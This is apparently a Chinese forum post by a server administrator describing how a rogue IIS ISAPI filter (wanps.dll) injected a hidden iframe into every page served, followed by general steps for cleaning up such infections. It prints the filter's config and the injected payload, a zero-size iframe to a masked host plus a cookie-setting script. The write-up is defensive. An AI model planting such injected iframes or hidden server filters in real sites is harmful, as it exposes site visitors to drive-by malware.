现象是一台服务器几乎所有网站打开网页 甚至HTML网页 都出现了

《iframe src=“http：//www.XXXXXXXXXXXXX.com/mmmmmmm.htm” height=0 width=0》《/iframe》 这种样式的代码 一般在头部部分杀毒软件打开会报毒

打开HTML或ASP PHP页面在源码中怎么也找不到这段代码起初会怀疑是JS，找了半天还是没有发现，连新建的HTML页面也会有这段代码～

仔细寻找问题应该在IIS上，打开IIS重新启动一次在主IIS上右键属性-----ISAPI，发现一个ISAPI扩展，没见过的，路径为：c：\windows\help\wanps.dll ，ISAP加载正常绿色状态，取消重新启动IIS，所有代码消失。

可以判断就是这个文件在作怪，提取出来就是者三个文件

wanps.ini内容为：

［Filter］

Cookie=GAG5=ABCDEFG

Redirector=C：\windows\help\wanps.txt

wanps.txt内容为：

《body》

《iframe src=“http：//www.XXXXXX.com/mm.htm” height=0 width=0》《/iframe》

《script language=“javascript”》

《！--

var expires = new Date（）;

expires.setTime（expires.getTime（） + 5 * 24* 60 * 60 * 1000）;

document.cookie=“GAG5=ABCDEFG;expires=”+expires.toGMTString（）;

--》

《/script》

《/body》

打此为此，马算是解决了，但后门肯定已经被人家掌握了，我清除马以后，过一段时间，又被人家挂上马了。哎~~~~

在网上查到一些解决挂马的办法，附上，希望对大家有用

首先发现自己访问多个站点被挂马以后需要按以下流程操作解决

1、迅速访问www.baidu.com看BAIDU是否被挂马，用于排除自己的PC中病毒引起的问题。如果你访问www.baidu.com也是被挂马的话，那你就杀毒就可以了！熊猫烧香好象应用了类似的预防被杀掉的措施。

2、迅速登陆FTP或者进入服务器查看相关文件是否被写入了代码，如果被写入代码那就找规律清除吧，某些黑客用批量文本替换工具挂的马，所以你找到替换字符，替换回来就可以迅速解决。

3、如果以上两个方案都没解决，迅速打开IIS，查看仔细寻找 打开IIS 重新启动一次 在主IIS上 右键属性 ISAPI 发现一个ISAPI扩展 没见过的 ISAP加载正常 绿色状态 取消 重新启动IIS 所有代码消失

4、如果还没有解决，那你就可以放心了，不是你的机器被入侵了，速速告诉机房，和你同一网关下的某机器被拿下来，被设置了ARP欺骗。这个现象就是包括服务器的404页面都被挂了马。你可以在防火墙里设置一些规则来避免掉。我所说的这个方法也是现在最流行的挂马的方法！